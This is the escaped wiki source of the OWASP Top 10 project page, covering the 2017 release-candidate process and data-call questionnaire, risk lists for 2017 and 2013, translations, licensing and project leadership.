RC2 is now [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf available for download]. In an ongoing effort to be transparent, we are asking for all comments to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issues list].&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call completed==&lt;br /&gt;
&lt;br /&gt;
* A big thank you to all industry professionals who completed this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey was &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 had been reopened, a bit thank you to all the contributors. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now closed. The deadline for the extended data call was &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail.&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_RC2_Final.pdf | OWASP Top 10 2017 RC2 - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 RC2 Published&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 2 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
RC2 is available for download [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf from GitHub]. &lt;br /&gt;
&lt;br /&gt;
We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. &lt;br /&gt;
&lt;br /&gt;
We strongly urge for any corrections or issues to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issue list].&lt;br /&gt;
&lt;br /&gt;
Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.&lt;br /&gt;
&lt;br /&gt;
(We will be reaching out to translators shortly.)&lt;br /&gt;
&lt;br /&gt;
Andrew van der Stock&amp;lt;br/&amp;gt;&lt;br /&gt;
Brian Glas&amp;lt;br/&amp;gt;&lt;br /&gt;
Neil Smithline&amp;lt;br/&amp;gt;&lt;br /&gt;
Torsten Gigler&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information - for historical reference only==&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.aspectsecurity.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
